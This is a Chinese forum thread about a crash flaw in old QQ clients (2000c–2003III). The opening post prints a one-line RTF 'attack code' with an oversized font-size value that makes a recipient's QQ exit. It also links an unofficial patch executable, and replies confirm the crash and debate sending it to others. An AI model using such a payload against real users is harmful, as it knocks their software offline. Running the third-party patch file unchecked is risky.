返回列表 发帖

QQ2003III代码攻击漏洞

该漏洞涉及的QQ版本为:
QQ2003III测试版、QQ2003II、QQ2003、QQ2000c
漏洞修补方法:
运行本安全补丁,更新QQ安装目录内的riched20.dll文件。
攻击代码:
{\urtf1\ansi\ansicpg936\deff0\deflanq1033\deflangfe2052{\fonttbl{\f0\fnil\fcharset134 'cb'ce'cc'e5;}} \fs1800000000000000000000000000000
说明:
我们在QQ2000c、QQ2003、QQ2003II和QQ2003III测试版中发现一个由于Richedit代码页溢出所引起的严重安全漏洞。例如,攻击者可以发送一个溢出代码,这个代码将导致QQ非法退出。该漏洞涉及的QQ版本为:QQ2003III测试版、QQ2003II、QQ2003、QQ2000c。漏洞修补方法:运行本安全补丁,更新QQ安装目录内的riched20.dll文件。同时,我们对腾讯公司欺骗用户的行为,表示愤慨。PS:不知道腾讯所谓的QQ2003II已经修正该BUG,到底修正了什么。 作者/发行商: 木子工作室

补丁下载(补丁由IT社团提供下载)
http://www.eroot.cn/download/jtqq.exe

QQ2003III代码攻击漏洞

真的得耶,我用另一个QQ来测试,一点它就出现那个什么错的,要重起。不过好象也没什么厉害的,只要重起就的 了

TOP

QQ2003III代码攻击漏洞

的确是这么回事。

TOP

QQ2003III代码攻击漏洞

这个我好象以前见过!
我记得是设置一个过大的字体

TOP

QQ2003III代码攻击漏洞

黑色海岸线,高手

TOP

QQ2003III代码攻击漏洞

TOP

QQ2003III代码攻击漏洞

顶顶了!

TOP

QQ2003III代码攻击漏洞

没有用!

TOP

QQ2003III代码攻击漏洞

让更多的人认识黑色海岸线,了解黑色海岸线

TOP

QQ2003III代码攻击漏洞

这是不要发的为好,人家重启就行了,你就得到黑名单了

TOP

QQ2003III代码攻击漏洞

没用吧,发给别人只是一片空白.发给自己,自己却挂了,

TOP

QQ2003III代码攻击漏洞

   打了补丁后,收到的就是一片空白了。

TOP

QQ2003III代码攻击漏洞

啊  我挂了

TOP

QQ2003III代码攻击漏洞

这个你都可以发。

TOP

QQ2003III代码攻击漏洞

我认为还是不要发的好

TOP

返回列表 回复 发帖